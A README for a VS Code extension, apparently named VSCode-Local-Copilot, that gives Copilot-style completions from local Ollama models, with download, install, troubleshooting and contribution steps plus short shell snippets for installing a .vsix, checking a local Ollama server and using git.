Cadentrex/VSCode-Local-Copilot

🎉 VSCode-Local-Copilot - Enhance Your Coding Experience Effortlessly

🚀 Getting Started

Welcome to VSCode-Local-Copilot! This tool brings enhanced coding support right to your fingertips in Visual Studio Code. With it, you'll enjoy GitHub Copilot-like capabilities using local Ollama models. Let's get you started!

📥 Download & Install

To download the latest version of VSCode-Local-Copilot, visit this page:

Download from Releases

On the Releases page, follow these steps to get your extension:

  1. Find the latest release at the top.
  2. Click on the release title to see the details.
  3. Locate the version suited for your system.
  4. Click the correct file name to download it.

System Requirements

  • OS: Windows 10 or later, macOS Mojave or later, or a recent version of Linux.
  • VS Code version: 1.50 or newer.
  • Memory: At least 4 GB of RAM.
  • Storage: 200 MB of free disk space.

🛠️ Setup Instructions

Once the download is complete, follow these steps to install and run VSCode-Local-Copilot:

  1. Locate the downloaded file:

    • On Windows, macOS, and Linux alike, the file lands in your Downloads folder (or wherever your browser saves files) as a .zip archive.
  2. Extract the files:

    • On Windows, right-click the .zip file and select "Extract All".
    • On macOS, double-click the .zip file.
    • On Linux, right-click and select "Extract Here".
  3. Install the extension in Visual Studio Code:

    • Open Visual Studio Code.
    • Click the Extensions icon in the sidebar (or press Ctrl + Shift + X; Cmd + Shift + X on macOS).
    • Click on the three dots at the top-right corner and choose "Install from VSIX...".
    • Browse to the extracted folder and select the .vsix file.
    • Click "Open" to begin the installation.
  4. Enable local models:

    • After installation, open the Command Palette by pressing Ctrl + Shift + P (Cmd + Shift + P on macOS).
    • Type "Local Copilot" and select "Enable Local Models".
  5. Start coding:

    • Create a new file or open an existing one.
    • Start typing, and you will see suggestions pop up!
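If you prefer the terminal, steps 2 and 3 can also be scripted with the VS Code command-line interface. This is a minimal sketch, assuming the `code` command is on your PATH (on macOS, run "Shell Command: Install 'code' command in PATH" from the Command Palette first); the folder path in the example is a placeholder for wherever you extracted the download:

```shell
# install_vsix: find the first .vsix file under a directory and install it
# with the VS Code CLI. Pass the folder you extracted the release into.
install_vsix() {
  dir="$1"
  vsix=$(find "$dir" -name '*.vsix' | head -n 1)
  if [ -z "$vsix" ]; then
    echo "no .vsix found in $dir" >&2
    return 1
  fi
  # Equivalent to "Install from VSIX..." in the Extensions view.
  code --install-extension "$vsix"
}

# Example (path is a placeholder):
# install_vsix ~/Downloads/vscode-local-copilot
```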

🎓 How It Works

VSCode-Local-Copilot leverages Ollama models running locally on your machine. This means fast response times for code suggestions without any need for internet access; note that Ollama itself must be installed and running for suggestions to work. Enjoy a seamless development experience with smart completions based on your coding patterns and style.

🔍 Features

  • Local Model Usage: No internet required for data processing.
  • Smart Suggestions: Receive code completions tailored to your work.
  • Multi-language Support: Completions for a wide range of programming languages.
  • Easy Integration: Simple setup process to get started right away.
  • Regular Updates: Stay tuned for new features and improvements.

🛠️ Troubleshooting

If you encounter issues, please consider the following troubleshooting tips:

  • Extension Not Visible: Open the Extensions view and confirm the installation succeeded; if the extension is missing, reinstall it from the .vsix file.
  • Slow Performance: Check system resources to ensure adequate RAM is available.
  • Suggestions Not Appearing: Restart Visual Studio Code, make sure local model features are enabled, and confirm that Ollama is running.
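A common cause of missing suggestions is that the Ollama server is not running. Assuming Ollama's default port (11434), this quick probe tells you whether its API is reachable:

```shell
# check_ollama: probe the local Ollama API. /api/tags lists installed models
# and responds on any healthy Ollama server; curl's -sf flags keep it quiet
# and make HTTP errors count as failures.
check_ollama() {
  if curl -sf "http://localhost:11434/api/tags" >/dev/null; then
    echo "Ollama is running"
  else
    echo "Ollama is not reachable on port 11434; start it with: ollama serve"
  fi
}
```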

🗣️ Get Help

For support, please open an issue on the GitHub repository, or refer to the FAQ section. Your feedback and questions are welcome!

💬 Contributing

If you'd like to contribute to VSCode-Local-Copilot, please follow these guidelines:

  1. Fork the repository.
  2. Create a new branch for your feature or fix.
  3. Make your changes and commit them.
  4. Push the branch back to your fork.
  5. Submit a pull request detailing your changes.
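The steps above map onto the following commands. The fork URL and branch name (`my-fix`) are placeholders to replace with your own:

```shell
# contribute: clone your fork, create a feature branch, and push it back.
# Between the checkout and the commit is where your actual edits happen.
contribute() {
  fork_url="$1"
  branch="$2"
  git clone "$fork_url" VSCode-Local-Copilot || return 1
  cd VSCode-Local-Copilot || return 1
  git checkout -b "$branch"
  # ...edit files here, then stage and commit:
  git add -A
  git commit -m "Describe your change"
  git push origin "$branch"
}

# Example: contribute https://github.com/<your-username>/VSCode-Local-Copilot.git my-fix
# Afterwards, open a pull request on GitHub from your branch.
```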

📜 License

VSCode-Local-Copilot is open-source software licensed under the MIT License. You are free to use, modify, and distribute the code, subject to the license's terms.

📜 Acknowledgments

  • Thanks to the creators of the Ollama model for their exceptional work in machine learning and AI.
  • A big thank you to the Visual Studio Code community for their continued support and contributions.

Remember, you can always download VSCode-Local-Copilot from this page:

Download from Releases